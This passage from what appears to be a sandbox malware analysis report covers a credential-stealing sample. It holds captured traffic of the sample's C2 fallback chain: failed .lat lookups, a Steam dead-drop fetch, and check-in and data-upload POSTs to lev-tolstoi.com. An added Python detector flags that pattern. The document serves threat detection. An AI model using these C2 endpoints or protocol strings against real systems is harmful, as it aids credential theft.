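Read together, the DNS tables above and the two HTTPS sessions that follow show the C2 fallback chain that characterises this sample: nine .lat domains are queried within about 1.4 seconds and every one returns Name error (NXDOMAIN); the sample then fetches a Steam community profile page (LummaC is documented to use a profile as a dead-drop resolver carrying its live C2 domain, although the report itself does not decode it), resolves lev-tolstoi.com and POSTs `act=life` to `/api`, the first check-in of this family's C2 protocol. The following Python detector is an added example and is not Joe Sandbox code or output. The event data is transcribed from the DNS answer and HTTPS session tables on this page (the CET DNS timestamps shifted to UTC to match the HTTP rows); the thresholds, the `DEAD_DROP_HOSTS` set and the `CHECKIN_PREFIX` string are assumptions of this example, not values the report states.

```python
"""Detect the NXDOMAIN burst -> dead-drop fetch -> C2 check-in chain in DNS/HTTP telemetry.

Added example, not Joe Sandbox code. Event data is transcribed from this report's
DNS answer and HTTPS session tables; the tunables below are this example's assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class DnsAnswer:
    ts: datetime
    client: str
    name: str
    rcode: int                      # 0 = No error, 3 = Name error (NXDOMAIN)
    address: Optional[str] = None   # A record, if the answer carried one


@dataclass(frozen=True)
class HttpRequest:
    ts: datetime
    client: str
    host: str
    method: str
    path: str
    body: str = ""


@dataclass
class Alert:
    client: str
    dead_domains: List[str]         # names that returned NXDOMAIN inside the burst
    dead_drop: Optional[str]        # host+path of the resolver fetch, if one was seen
    c2_host: str
    c2_ips: List[str]
    checkin_body: str


# Tunables: assumptions of this example, not values taken from the report.
BURST_MIN_NAMES = 5                         # distinct NXDOMAIN names that count as a burst
BURST_WINDOW = timedelta(seconds=30)
FOLLOWUP_WINDOW = timedelta(seconds=120)    # how long after the burst to look for the check-in
DEAD_DROP_HOSTS = {"steamcommunity.com"}    # public site abused as a dead-drop resolver
CHECKIN_PREFIX = "act="                     # POST body prefix of the C2 check-in


def find_nxdomain_burst(answers: List[DnsAnswer], client: str) -> Optional[Tuple[datetime, datetime, List[str]]]:
    """First BURST_WINDOW holding >= BURST_MIN_NAMES distinct NXDOMAIN names: (start, end, names)."""
    nx = sorted((a for a in answers if a.client == client and a.rcode == 3), key=lambda a: a.ts)
    for i, first in enumerate(nx):
        window = [a for a in nx[i:] if a.ts - first.ts <= BURST_WINDOW]
        names = sorted({a.name for a in window})
        if len(names) >= BURST_MIN_NAMES:
            return first.ts, window[-1].ts, names
    return None


def detect_c2_fallback(answers: List[DnsAnswer], requests: List[HttpRequest], client: str) -> Optional[Alert]:
    """Alert only when a burst is followed by a check-in POST to a name that resolved after it."""
    burst = find_nxdomain_burst(answers, client)
    if burst is None:
        return None
    _, burst_end, dead = burst
    deadline = burst_end + FOLLOWUP_WINDOW

    # Names that resolved successfully after the burst are the candidate live C2s.
    resolved: Dict[str, List[str]] = {}
    for a in answers:
        if a.client == client and a.rcode == 0 and a.address and burst_end <= a.ts <= deadline:
            resolved.setdefault(a.name, []).append(a.address)

    dead_drop = None
    for r in sorted(requests, key=lambda r: r.ts):
        if r.client != client or not burst_end <= r.ts <= deadline:
            continue
        if r.method == "GET" and r.host in DEAD_DROP_HOSTS and dead_drop is None:
            dead_drop = r.host + r.path
        elif r.method == "POST" and r.body.startswith(CHECKIN_PREFIX) and r.host in resolved:
            return Alert(client, dead, dead_drop, r.host, resolved[r.host], r.body)
    return None


def _ts(hms: str, micros: int = 0) -> datetime:
    """UTC timestamp on the report date (2024-12-26) from 'HH:MM:SS'."""
    h, m, s = (int(x) for x in hms.split(":"))
    return datetime(2024, 12, 26, h, m, s, micros, tzinfo=timezone.utc)


CLIENT = "192.168.2.5"
# Transcribed from the DNS answer table (12:45 CET is 11:45 UTC).
DNS_ANSWERS = [
    DnsAnswer(_ts("11:45:07", 602500), CLIENT, "observerfry.lat", 3),
    DnsAnswer(_ts("11:45:07", 745450), CLIENT, "wordyfindy.lat", 3),
    DnsAnswer(_ts("11:45:07", 891181), CLIENT, "slipperyloo.lat", 3),
    DnsAnswer(_ts("11:45:08", 33308), CLIENT, "manyrestro.lat", 3),
    DnsAnswer(_ts("11:45:08", 180594), CLIENT, "shapestickyr.lat", 3),
    DnsAnswer(_ts("11:45:08", 325007), CLIENT, "talkynicer.lat", 3),
    DnsAnswer(_ts("11:45:08", 466439), CLIENT, "curverpluch.lat", 3),
    DnsAnswer(_ts("11:45:08", 649118), CLIENT, "tentabatte.lat", 3),
    DnsAnswer(_ts("11:45:08", 809952), CLIENT, "bashfulacid.lat", 3),
    DnsAnswer(_ts("11:45:09", 125432), CLIENT, "steamcommunity.com", 0, "23.55.153.106"),
    DnsAnswer(_ts("11:45:11", 901314), CLIENT, "lev-tolstoi.com", 0, "172.67.157.254"),
    DnsAnswer(_ts("11:45:11", 901314), CLIENT, "lev-tolstoi.com", 0, "104.21.66.86"),
]
# Transcribed from HTTPS sessions 0 and 1.
HTTP_REQUESTS = [
    HttpRequest(_ts("11:45:10"), CLIENT, "steamcommunity.com", "GET", "/profiles/76561199724331900"),
    HttpRequest(_ts("11:45:13"), CLIENT, "lev-tolstoi.com", "POST", "/api", "act=life"),
]

if __name__ == "__main__":
    print(detect_c2_fallback(DNS_ANSWERS, HTTP_REQUESTS, CLIENT))
```

Run stand-alone it prints one Alert for 192.168.2.5 naming the nine dead .lat domains, the profile fetch and lev-tolstoi.com with both resolved addresses. The burst alone is deliberately not alertable: ordinary hosts produce NXDOMAIN runs too (expired CDN names, typo lookups), so the alert is raised only when a check-in POST follows to a name that resolved after the burst, which is the part of the chain a legitimate host does not reproduce.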
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | 3500 | C:\Users\user\Desktop\6GNqkkKY0j.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:45:10 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-12-26 11:45:11 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Thu, 26 Dec 2024 11:45:11 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=5d7ce44dc46ee3ea4d9974a9; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 11:45:11 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 11:45:11 UTC | 10097 | IN | Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 11:45:11 UTC | 10545 | IN | Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
    Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | 3500 | C:\Users\user\Desktop\6GNqkkKY0j.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:45:13 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
2024-12-26 11:45:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-26 11:45:16 UTC | 1130 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Dec 2024 11:45:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=tc42rn24gg7ifkudftuap193v0; expires=Mon, 21 Apr 2025 05:31:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lNi6jkEXbasj8DJZW%2B%2FovXU1g2jXcTn65OQL6b9CzAUp56mkwcovmnNBI7Zhxuw%2BILkTErdDPZAL%2Be6TmAZ5WrQSq4Y%2B98BpO%2FU6RYxTYtOV8LZzPrKWx179t41EKp4XXEU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8f80d2cb6efc0f55-EWR
                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1785932&cwnd=156&unsent_bytes=0&cid=64a98c0f541e1f51&ts=2827&x=0"
                                                                                                                                                                                                                                                                    2024-12-26 11:45:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                                                                                                                    2024-12-26 11:45:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49706        172.67.157.254  443               3500  C:\Users\user\Desktop\6GNqkkKY0j.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:45:17 UTC  263  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: lev-tolstoi.com
2024-12-26 11:45:17 UTC  53  OUT  Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 11:45:37 UTC  1131  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:45:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hd8o268toco5ubqi2m52hgl795; expires=Mon, 21 Apr 2025 05:32:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nz1CTgeFjs7G%2Bl2nGSx9qLXVw85dyi7lfjCmAhY1rghdoGnVHWv0TsJm7vy%2F00LS1HmWFpfJIord%2BN3s%2Flp%2FSmJDhKag6P7%2Bx0AnBVkO3xkIeAcKjuzrZNkCM2ryW5Bgfzs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d2e55fd94228-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1863&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1492842&cwnd=209&unsent_bytes=0&cid=06fc03077b6a9587&ts=20060&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49743        172.67.157.254  443               3500  C:\Users\user\Desktop\6GNqkkKY0j.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:45:39 UTC  280  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=YXHVYIT847QELZEBS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12835
Host: lev-tolstoi.com
2024-12-26 11:45:39 UTC  12835  OUT  Data Raw: 2d 2d 59 58 48 56 59 49 54 38 34 37 51 45 4c 5a 45 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 31 46 37 46 30 32 34 45 38 35 33 37 44 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 58 48 56 59 49 54 38 34 37 51 45 4c 5a 45 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 58 48 56 59 49 54 38 34 37 51 45 4c 5a 45 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
Data Ascii: --YXHVYIT847QELZEBSContent-Disposition: form-data; name="hwid"2B1F7F024E8537D2BEBA0C6A975F1733--YXHVYIT847QELZEBSContent-Disposition: form-data; name="pid"2--YXHVYIT847QELZEBSContent-Disposition: form-data; name="lid"LOGS11--LiveTraf


Session ID: 4
Source IP: 192.168.2.5
Source Port: 49809
Destination IP: 172.67.157.254
Destination Port: 443
PID: 3500
Process: C:\Users\user\Desktop\6GNqkkKY0j.exe

Timestamp: 2024-12-26 11:46:09 UTC
Bytes transferred: 281
Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=T5B0SDDXPB8XPSJITU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15083
Host: lev-tolstoi.com

Timestamp: 2024-12-26 11:46:09 UTC
Bytes transferred: 15083
Direction: OUT
Data Raw: 2d 2d 54 35 42 30 53 44 44 58 50 42 38 58 50 53 4a 49 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 31 46 37 46 30 32 34 45 38 35 33 37 44 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 35 42 30 53 44 44 58 50 42 38 58 50 53 4a 49 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 35 42 30 53 44 44 58 50 42 38 58 50 53 4a 49 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
Data Ascii: --T5B0SDDXPB8XPSJITUContent-Disposition: form-data; name="hwid"2B1F7F024E8537D2BEBA0C6A975F1733--T5B0SDDXPB8XPSJITUContent-Disposition: form-data; name="pid"2--T5B0SDDXPB8XPSJITUContent-Disposition: form-data; name="lid"LOGS11--LiveT


[Graph residue: two process resource graphs (x-axis 0-100 s; y-axes 0-100 and 0-20 MB) and a behavior distribution chart with legend entries File and Registry]

Target ID: 0
Start time: 06:45:05
Start date: 26/12/2024
Path: C:\Users\user\Desktop\6GNqkkKY0j.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\6GNqkkKY0j.exe"
Imagebase: 0x2f0000
File size: 2'894'848 bytes
MD5 hash: 1778A174A471FDEC99C35907F2267D30
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 013E7000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_13e7000_6GNqkkKY0j.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2.5.29.15$p:
• API String ID: 0-346634184
• Opcode ID: cc1dbdf5d0cfa3dcd2a2d61f144fb4745583ee84a07ea2b9a6ca4271231399f6
• Instruction ID: 52d408b1f66f018f3ef5f5e132af709d4b3d2d71af33a14204d35d7d30a71f92
• Opcode Fuzzy Hash: cc1dbdf5d0cfa3dcd2a2d61f144fb4745583ee84a07ea2b9a6ca4271231399f6
• Instruction Fuzzy Hash: 48C1406144E3C29FD7278B788C65295BFB1AE53228B1E81DBC5D0CF1A3D25D4C4ACB62

Strings
Memory Dump Source
• Source File: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 013E7000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_13e7000_6GNqkkKY0j.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2.5.29.15$p:
• API String ID: 0-346634184
• Opcode ID: 3605f5a58b86a09e85ff99b4f90634a05a4eec9baf239b2d3b944332bcfde4c0
• Instruction ID: 31ecd57395f527255f9834869d7f29799937167c258c054ecfe8e43a273fa65a
• Opcode Fuzzy Hash: 3605f5a58b86a09e85ff99b4f90634a05a4eec9baf239b2d3b944332bcfde4c0
• Instruction Fuzzy Hash: 5AD12F6144E3C29FC7278BB88864695BFB1AE53228B1E81DBC5D0CF1B3D25D4C5AC762